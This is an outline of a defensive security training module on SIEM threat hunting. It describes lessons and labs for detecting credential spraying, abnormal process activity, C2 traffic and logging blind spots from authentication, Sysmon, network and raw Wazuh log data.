Module 2: SIEM Hunting Deep Dive
Hunt within constrained data — authentication only, Sysmon only, network logs only. Discover what each source reveals and what it hides.
Lessons & Labs
Authentication Hunting
Credential spray patterns, impossible travel, off-hours logons, service account abuse, and how to detect slow-and-low attacks that stay below brute-force thresholds.
Lab 2.1 — Auth-Only Hunt
Constrained to authentication events (4624/4625/4634). Find the slow credential spray attack using ONLY logon events. No Sysmon, no firewall, no DNS.
Process and Sysmon Hunting
Parent-child process analysis, rare process detection, living-off-the-land binaries, encoded commands, and Sysmon event type deep dives.
Lab 2.2 — Sysmon-Only Hunt
Constrained to Sysmon events (EID 1/3/7/8/11/13). Find the insider's abnormal process activity using ONLY endpoint telemetry.
Network-Aware SIEM Hunting
DNS anomalies visible in SIEM data, proxy patterns, firewall deny intelligence, and C2 indicators detectable without a dedicated network sensor.
Lab 2.3 — DNS and Proxy Hunt
Constrained to DNS, proxy, and firewall events. Find C2 communication and data exfiltration using ONLY network-layer SIEM data.
Log Coverage Assessment
Visibility gaps and blind spots. Single points of failure. Sysmon deployment gaps. Mapping your log coverage to ATT&CK techniques — and knowing where you cannot hunt.
Lab 2.4 — Coverage Gap Analysis
Full dataset analysis: which attack scenarios are visible from which log source? Map coverage, identify blind spots, and recommend instrumentation improvements.
Archives and Raw Log Hunting
Hunting in wazuh-archives-* where there are no rule.level scores to guide you. Pure data exploration with 150K+ raw events — the closest lab environment to real-world hunting.
Lab 2.5 — Archives Deep Dive
Hunt in wazuh-archives-* (150K+ raw events). No rule.level, no CDB enrichment. Find the anomalies buried in raw log volume using only field analysis and aggregation.